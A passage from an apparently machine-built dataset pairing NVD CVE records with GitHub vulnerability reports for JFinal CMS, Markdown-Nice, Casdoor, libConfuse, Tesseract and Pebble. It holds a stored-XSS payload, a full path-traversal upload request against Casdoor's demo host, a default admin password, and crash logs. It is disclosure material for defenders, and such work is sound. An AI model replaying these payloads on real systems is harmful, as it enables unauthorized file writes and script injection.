"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/52"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/52"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/jflyfox/jfinal_cms/issues/52 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | Administrator login is required. The default account password is admin:admin123
## admin/videoalbum/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/videoalbum/list`

## admin/video/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/video/list`

## system/department/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `system/department/list`

## system/menu/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `system/menu/list`

## system/role/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `system/role/list`
 | Some SQL injection vulnerabilities exists in JFinal CMS 5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/52/comments | 0 | 2022-08-09T10:01:49Z | 2022-08-09T10:01:49Z | https://github.com/jflyfox/jfinal_cms/issues/52 | 1,333,015,169 | 52 | 4,119 |
CVE-2022-38639 | 2022-09-09T19:15:08.313 | A cross-site scripting (XSS) vulnerability in Markdown-Nice v1.8.22 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Community Posting field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/mdnice/markdown-nice/issues/327"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/mdnice/markdown-nice/issues/327"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:inkdrop:markdown_nice:1.8.22:*:*:*:*:*:*:*",
"matchCriteriaId": "88A634C2-783D-495C-AE35-B9675EF1E397",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/mdnice/markdown-nice/issues/327 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"mdnice",
"markdown-nice"
] | The markdown preview executes the xss vector, and the stored xss occurs in the community posting, which can be fixed by the [DOMPurify](https://github.com/cure53/DOMPurify) project.
`<img src=1 onerror=alert(1)>`

| markdown preview executes the xss Vulnerability | https://api.github.com/repos/mdnice/markdown-nice/issues/327/comments | 0 | 2022-08-21T05:32:10Z | 2022-08-21T05:32:39Z | https://github.com/mdnice/markdown-nice/issues/327 | 1,345,391,399 | 327 | 4,120 |
CVE-2022-38638 | 2022-09-09T20:15:11.340 | Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/casdoor/casdoor/issues/1035"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/casdoor/casdoor/issues/1035"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:casbin:casdoor:1.97.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DE13C979-CCE6-412B-B288-83F643A798D4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/casdoor/casdoor/issues/1035 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"casdoor",
"casdoor"
] | Hi, I found a security issue, when the upload provider is Storage Local File System, the `fullFilePath` parameter of the interface `/api/upload-resource` will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below:

```http
POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider_storage_local_file_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider_storage_local_file_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor_session_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: */*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png
I'm here.
------WebKitFormBoundaryUPAwhIoXMrbemuJM--
```
Then we can find out that the problem does occur by following this link。
https://door.casdoor.com/flag.html

| Arbitrary file write/overwrite Vulnerability | https://api.github.com/repos/casdoor/casdoor/issues/1035/comments | 3 | 2022-08-19T12:19:28Z | 2022-09-12T06:22:15Z | https://github.com/casdoor/casdoor/issues/1035 | 1,344,366,609 | 1,035 | 4,121 |
CVE-2022-40320 | 2022-09-09T21:15:08.577 | cfg_tilde_expand in confuse.c in libConfuse 3.3 has a heap-based buffer over-read. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libconfuse/libconfuse/issues/163"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BSAZK4KAWRWNAFUBBXOYU3PVNH3X7226/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EDUT2V62V2XF2IT5TJFPB6P3EQ6X5VLL/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FJKHAPJ6AUWVP4HDGKH4M5A2XXWQI73O/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libconfuse/libconfuse/issues/163"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BSAZK4KAWRWNAFUBBXOYU3PVNH3X7226/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EDUT2V62V2XF2IT5TJFPB6P3EQ6X5VLL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FJKHAPJ6AUWVP4HDGKH4M5A2XXWQI73O/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libconfuse_project:libconfuse:3.3:*:*:*:*:*:*:*",
"matchCriteriaId": "8133F4E0-4B30-4ACC-8123-712738E73B1F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*",
"matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*",
"matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/libconfuse/libconfuse/issues/163 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"libconfuse",
"libconfuse"
] | ## short summary
Hello, I was testing my fuzzer and found a heap buffer overflow in cfg_tilde_expand, src/confuse.c:1909. A heap buffer overflow can be triggered when parsing a crafted file. As shown in the attachment
## Step to reproduce
```
CC="gcc -fsanitize=address -g " CXX="g++ -fsanitize=address -g" ./autogen.sh && ./configure --disable-shared && make -j$(nproc)
./examples/cfgtest $POC
```
## Environment
* Ubuntu 22.04 (docker image)
* gcc 11.2.0
* libconfuse latest commit 0325922cfff66ba32c3c60d8c9ddf606a22e059f
## ASan Log
```
Using libConfuse 3.3 by Martin Hedenfalk <martin@bzero.se>
=================================================================
==418268==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000572 at pc 0x7f94939440ab bp 0x7ffcd3b274a0 sp 0x7ffcd3b26c48
READ of size 3 at 0x602000000572 thread T0
#0 0x7f94939440aa in __interceptor_getpwnam ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1922
#1 0x555a8791cb33 in cfg_tilde_expand /benchmark/libconfuse/src/confuse.c:1909
#2 0x555a8792a97f in cfg_lexer_include /benchmark/libconfuse/src/lexer.l:332
#3 0x555a8791d6e0 in call_function /benchmark/libconfuse/src/confuse.c:1274
#4 0x555a87921a3e in cfg_parse_internal /benchmark/libconfuse/src/confuse.c:1566
#5 0x555a87922523 in cfg_parse_fp /benchmark/libconfuse/src/confuse.c:1701
#6 0x555a87922523 in cfg_parse_fp /benchmark/libconfuse/src/confuse.c:1685
#7 0x555a8792266f in cfg_parse /benchmark/libconfuse/src/confuse.c:1802
#8 0x555a8791750a in main /benchmark/libconfuse/examples/cfgtest.c:129
#9 0x7f94936bad8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#10 0x7f94936bae3f in __libc_start_main_impl ../csu/libc-start.c:392
#11 0x555a87917d04 in _start (/benchmark/libconfuse/examples/cfgtest+0x7d04)
0x602000000572 is located 0 bytes to the right of 2-byte region [0x602000000570,0x602000000572)
allocated by thread T0 here:
#0 0x7f949396d867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x555a8791cb0d in cfg_tilde_expand /benchmark/libconfuse/src/confuse.c:1904
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1922 in __interceptor_getpwnam
Shadow bytes around the buggy address:
0x0c047fff8050: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x0c047fff8060: fa fa 00 fa fa fa 05 fa fa fa fd fa fa fa fd fa
0x0c047fff8070: fa fa 00 fa fa fa fd fd fa fa 00 fa fa fa 00 fa
0x0c047fff8080: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa 00 fa
0x0c047fff8090: fa fa fd fd fa fa 00 fa fa fa 00 fa fa fa 00 fa
=>0x0c047fff80a0: fa fa 00 fa fa fa 03 fa fa fa 00 fa fa fa[02]fa
0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==418268==ABORTING
```
## Credit
Han Zheng (NCNIPC of China, Hexhive)
## POC
[poc0.zip](https://github.com/libconfuse/libconfuse/files/9476056/poc0.zip)
| [BUG] heap buffer overflow in cfg_tilde_expand | https://api.github.com/repos/libconfuse/libconfuse/issues/163/comments | 0 | 2022-09-02T07:59:23Z | 2022-09-02T14:13:47Z | https://github.com/libconfuse/libconfuse/issues/163 | 1,359,841,405 | 163 | 4,122 |
CVE-2022-38266 | 2022-09-09T22:15:08.830 | An issue in the Leptonica linked library (v1.79.0) allows attackers to cause an arithmetic exception leading to a Denial of Service (DoS) via a crafted JPEG file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DanBloomberg/leptonica/commit/f062b42c0ea8dddebdc6a152fd16152de215d614"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tesseract-ocr/tesseract/issues/3498"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00018.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://security.gentoo.org/glsa/202312-01"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DanBloomberg/leptonica/commit/f062b42c0ea8dddebdc6a152fd16152de215d614"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tesseract-ocr/tesseract/issues/3498"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00018.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.gentoo.org/glsa/202312-01"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tesseract_project:tesseract:5.0.0:alpha-20210401:*:*:*:*:*:*",
"matchCriteriaId": "D83B1B84-78AE-4CFD-B425-509B29AF243B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:leptonica:leptonica:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1616069D-AF01-4FED-83F7-80566DF507D7",
"versionEndExcluding": "1.80.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"369"
] | 369 | https://github.com/tesseract-ocr/tesseract/issues/3498 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tesseract-ocr",
"tesseract"
] | ### **System Configuration**
- tesseract version: 5.0.0-alpha-20210401
- linked library version:
leptonica-1.79.0
libgif 5.1.4 : libjpeg 8d (libjpeg-turbo 2.0.3) : libpng 1.6.37 : libtiff 4.1.0 : zlib 1.2.11 : libwebp 0.6.1 : libopenjp2 2.3.1
Found AVX512BW
Found AVX512F
Found AVX2
Found AVX
Found FMA
Found SSE
Found OpenMP 201511
Found libcurl/7.68.0 GnuTLS/3.6.13 zlib/1.2.11 brotli/1.0.7 libidn2/2.2.0 libpsl/0.21.0 (+libidn2/2.2.0) libssh/0.9.3/openssl/zlib nghttp2/1.40.0 librtmp/2.3
- Environment (Operating system, version and so on): Ubuntu 20.04.2 64bit
## Program received signal SIGFPE, Arithmetic exception.
#0 0x00007ffff7dbe24a in pixBlockconvGray () from /lib/x86_64-linux-gnu/liblept.so.5
#1 0x00007ffff7dbeadd in pixBlockconv () from /lib/x86_64-linux-gnu/liblept.so.5
#2 0x00005555556b2d9b in tesseract::TextlineProjection::ConstructProjection (this=0x55555586e230, input_block=input_block@entry=0x55555587e110, rotation=..., nontext_map=...) at ./src/ccstruct/image.h:34
#3 0x00005555556980a7 in tesseract::StrokeWidth::GradeBlobsIntoPartitions (this=0x55555586ac20, pageseg_mode=pageseg_mode@entry=tesseract::PSM_AUTO, rerotation=..., block=block@entry=0x55555587e110, nontext_pix=...,
denorm=<optimized out>, cjk_script=0x0, projection=0x55555586e230, diacritic_blobs=0x7fffffffd018, part_grid=0x55555586e1d8, big_parts=0x55555586e208) at src/textord/strokewidth.cpp:371
#4 0x000055555566b4e5 in tesseract::ColumnFinder::FindBlocks (this=this@entry=0x55555586e0a0, pageseg_mode=pageseg_mode@entry=tesseract::PSM_AUTO, scaled_color=..., scaled_factor=<optimized out>,
input_block=input_block@entry=0x55555587e110, photo_mask_pix=..., thresholds_pix=..., grey_pix=..., pixa_debug=0x7ffff624cbd0, blocks=0x7fffffffcf78, diacritic_blobs=0x7fffffffd018, to_blocks=0x7fffffffd020)
at src/textord/colfind.cpp:295
#5 0x00005555555b1c8f in tesseract::Tesseract::AutoPageSeg (this=0x7ffff6229010, pageseg_mode=tesseract::PSM_AUTO, blocks=0x555556f3f830, to_blocks=0x7fffffffd020, diacritic_blobs=0x7fffffffd018, osd_tess=<optimized out>,
osr=0x7fffffffd3d0) at src/ccmain/pagesegmain.cpp:226
#6 0x00005555555b214d in tesseract::Tesseract::SegmentPage (this=0x7ffff6229010, input_file=<optimized out>, blocks=0x555556f3f830, osd_tess=osd_tess@entry=0x0, osr=osr@entry=0x7fffffffd3d0) at ./src/ccutil/params.h:202
#7 0x0000555555580e17 in tesseract::TessBaseAPI::FindLines (this=0x7fffffffe100) at /usr/include/c++/9/bits/basic_string.h:2300
#8 0x0000555555583608 in tesseract::TessBaseAPI::Recognize (this=0x7fffffffe100, monitor=0x0) at src/api/baseapi.cpp:838
#9 0x0000555555583c0a in tesseract::TessBaseAPI::ProcessPage (this=this@entry=0x7fffffffe100, pix=0x55555587a110, page_index=page_index@entry=0x0,
filename=filename@entry=0x7fffffffe77a "/home/ubuntu/Aws-Results/orcheFuzz-newbug/output_tesseract_of/initial_crashes/2021-05-06-03:01:41_0x7b7d0fd6_0xb1c1261c", retry_config=retry_config@entry=0x0,
timeout_millisec=timeout_millisec@entry=0x0, renderer=0x55555586e710) at src/api/baseapi.cpp:1259
#10 0x0000555555584888 in tesseract::TessBaseAPI::ProcessPagesInternal (this=0x7fffffffe100, filename=<optimized out>, retry_config=0x0, timeout_millisec=0x0, renderer=0x55555586e710) at /usr/include/c++/9/bits/basic_string.h:2300
#11 0x0000555555584e33 in tesseract::TessBaseAPI::ProcessPages (this=0x7fffffffe100, filename=<optimized out>, retry_config=<optimized out>, timeout_millisec=<optimized out>, renderer=<optimized out>) at src/api/baseapi.cpp:1071
#12 0x0000555555575ba5 in main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffe528) at /usr/include/c++/9/bits/unique_ptr.h:360
#13 0x00007ffff771f0b3 in __libc_start_main (main=0x555555574ee0 <main(int, char**)>, argc=0x3, argv=0x7fffffffe528, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe518)
at ../csu/libc-start.c:308
#14 0x000055555557d1be in _start () at /usr/include/x86_64-linux-gnu/bits/stdio2.h:100
I've attached the file. Please download and check the file.
[2021-05-06-03_01_41_0x7b7d0fd6_0xb1c1261c.zip](https://github.com/tesseract-ocr/tesseract/files/6821974/2021-05-06-03_01_41_0x7b7d0fd6_0xb1c1261c.zip)
| While processing, division by zero causes an arithmetic exception | https://api.github.com/repos/tesseract-ocr/tesseract/issues/3498/comments | 13 | 2021-07-15T09:34:01Z | 2022-11-21T16:44:14Z | https://github.com/tesseract-ocr/tesseract/issues/3498 | 945,189,724 | 3,498 | 4,123 |
CVE-2022-37767 | 2022-09-12T14:15:09.110 | Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springbok. NOTE: the vendor disputes this because input to the Pebble templating engine is intended to include arbitrary Java code, and thus either the input should not arrive from an untrusted source, or else the application using the engine should apply restrictions to the input. The engine is not responsible for validating the input. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Y4tacker/Web-Security/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Y4tacker/Web-Security/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pebbletemplates:pebble_templates:3.1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "9A45A63E-6BB7-4C65-9557-4516199DE5C9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"PebbleTemplates",
"pebble"
] | Hello,
since this morning security checks in our projects are reporting new critical vulnerability in the current pebble version 3.1.5:
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-37767
Original report: https://github.com/Y4tacker/Web-Security/issues/3
Any short-term workaround to mitigate the vulnerability? | Vulnerability CVE-2022-37767 | https://api.github.com/repos/PebbleTemplates/pebble/issues/625/comments | 38 | 2022-09-15T07:30:44Z | 2023-03-23T16:02:53Z | https://github.com/PebbleTemplates/pebble/issues/625 | 1,374,064,812 | 625 | 4,124 |
CVE-2022-37767 | 2022-09-12T14:15:09.110 | Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springbok. NOTE: the vendor disputes this because input to the Pebble templating engine is intended to include arbitrary Java code, and thus either the input should not arrive from an untrusted source, or else the application using the engine should apply restrictions to the input. The engine is not responsible for validating the input. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Y4tacker/Web-Security/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Y4tacker/Web-Security/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pebbletemplates:pebble_templates:3.1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "9A45A63E-6BB7-4C65-9557-4516199DE5C9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/Y4tacker/Web-Security/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
